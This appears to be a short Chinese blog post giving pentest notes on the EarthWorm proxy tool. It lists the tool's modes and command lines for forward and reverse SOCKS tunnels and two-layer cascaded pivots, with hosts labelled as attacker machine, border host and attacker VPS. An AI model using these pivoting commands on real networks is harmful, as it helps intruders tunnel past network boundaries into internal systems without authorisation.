2022-02-24代理EarthWorm

# EW Earthworm (已经停止更新,被杀软列为病毒)

6种命令格式(ssocksd、rcsocks、rssocks、1cx_s1ave、1cx_listen、1cx_tran)ssocksd正向代理

rcsock                  反向代理客户端

rssocks                反向代理服务端

1cx_s1ave            一侧通过反弹方式连接代理请求方,另一侧连接代理提供主机

1cx_tran                通过监听本地端口接收代理请求,并转发给代理提供主机

1cx_listen             通过监听本地端口接收数据,并将其转交给目标网络回连的代理提供主机


EW——1层连接(正向socks)

• 将边界机作为代理服务器

• 边界机:ew_for_Win.exe -s ssocksd -l 8888

EW——1层连接(反向socks)

• 反向socks

• 攻击机:ew_for_Win.exe -s rcsocks -l 8888 -e 6666

• 边界机:ew_for_Win.exe -s rssocks -d 192.168.7.144 -e 666

EW——2层级联(正向)

• 二级内网边界机:ew_for_Win.exe -s ssocksd -l 6666

• 一层内网边界机器:ew_for_Win.exe -s lcx_tran -l 8888 -f 二层内网ip -g 6666

ew_for_Win.exe -s lcx_tran -l 8888 -f 192.168.11.13 -g 6666

EW——2层级联(反向)

• 二级内网边界机:ew_for_Win.exe -s ssocksd -l 6666

• 攻击机外网的vps:ew_for_Win.exe -s lcx_listen -l 8888 -e 7777

• 一层内网边界机:ew_for_Win.exe -s lcx_slave -d 192.168.7.144 -e 7777 -f 192.168.11.14 -g 6666

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容